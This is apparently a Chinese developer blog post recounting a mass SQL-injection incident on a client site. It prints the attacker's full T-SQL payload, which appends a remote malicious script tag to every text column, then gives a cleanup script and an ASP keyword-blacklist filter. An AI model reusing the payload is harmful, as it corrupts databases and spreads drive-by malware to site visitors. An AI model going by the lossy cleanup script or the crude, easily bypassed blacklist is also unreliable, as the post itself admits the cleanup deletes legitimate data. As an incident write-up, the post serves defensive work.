最近客戶的網(wǎng)站被 注入了<script src=http://www.nmidahena.com/1.js></script>。整個(gè)網(wǎng)站的數(shù)據(jù)庫(kù)基本上都在內(nèi)容的后面加入了 <script src=http://www.nmidahena.com/1.js></script>
經(jīng)分析����,網(wǎng)站不止一次被注入����。
在網(wǎng)上查詢 了一些資料��,注入的SQL語(yǔ)句是這樣的:
===============================================
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR
FOR
select a.name, b.name
from sysobjects a,syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://www.nmidahena.com/1.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
數(shù)據(jù)庫(kù)里的varchar,nvarchar,ntext這些類型的字段基本上都被感染���。
更無(wú)恥的就是��,如果字段的大小過小,他會(huì)把原有的內(nèi)容刪掉。而保存完整的<script src=http://www.nmidahena.com/1.js></script>���。很多數(shù)據(jù)都被破壞了。
花了一天的功夫終于寫出來清除這些小尾巴的方法:
===============================================
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR
FOR
select a.name, b.name
from sysobjects a,syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
('update [' + @T + '] set [' + @C + '] = ( case when
( CHARINDEX(''<script'', [' + @C + '])>0)
then
left( rtrim(convert(nvarchar,['+ @C + '])), CHARINDEX(''<script'', ['+ @C + '] )-1)
else
[' + @C + ']
end )
')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
這里CHARINDEX(''<script'', ['+ @C + '] ) 是因?yàn)橛泻芏嘧侄伪欢啻胃腥荆闪?lt;script src=<script src=http://www.nmidahena.com/1.js></script>這樣的內(nèi)容����。所以以<script 為標(biāo)志�,全部刪除。這樣可能會(huì)刪除一些合法的,但是沒辦法���。�。。如果要清理干凈���。必須得這么做。
做完以為����,對(duì)網(wǎng)站進(jìn)行一下SQL的重點(diǎn)過濾:
==========FilterSqlAttack.asp==============
<%
Call FilterSqlAttack()
Sub FilterSqlAttack()
dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post
sql_leach = "and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare"
sql_leach_0 = split(sql_leach,",")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.QueryString(SQL_Get)),sql_leach_0(SQL_Data))>0 Then
Response.Write "請(qǐng)不要嘗試進(jìn)行SQL注入��!"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.Form(Sql_Post)),sql_leach_0(SQL_Data))>0 Then
Response.Write "請(qǐng)不要嘗試進(jìn)行SQL注入!"
Response.end
end if
next
next
end if
If Request.Cookies<>"" Then
For Each Sql_Post In Request.Cookies
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.Cookies(Sql_Post)),sql_leach_0(SQL_Data))>0 Then
Response.Write "含有非法字符,已記錄IP"
Response.end
end if
next
next
end if
End Sub
%>
==========================
本文來自CSDN博客����,轉(zhuǎn)載請(qǐng)標(biāo)明出處:http://blog.csdn.net/RyanGT/archive/2008/04/08/2260742.aspx
400 186 1886
